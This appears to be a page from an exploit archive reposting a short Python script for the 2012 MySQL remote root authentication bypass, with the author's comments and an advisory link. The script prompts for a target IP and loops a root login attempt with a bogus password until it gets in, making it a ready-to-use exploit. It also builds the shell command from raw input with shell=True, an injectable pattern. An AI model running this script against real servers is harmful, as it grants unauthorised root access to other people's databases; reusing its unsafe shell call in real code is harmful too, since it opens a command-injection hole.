[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MySQL Remote Root Authentication Bypass
# Published : 2012-06-12
# Author :
# Previous Title : Apache Struts <= Remote Command Execution
# Next Title : Symantec Web Gateway 5.0.2 Remote LFI Root Exploit

# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess

ipaddr = raw_input("Enter the IP address of the mysql server: ")

while 1:
	subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()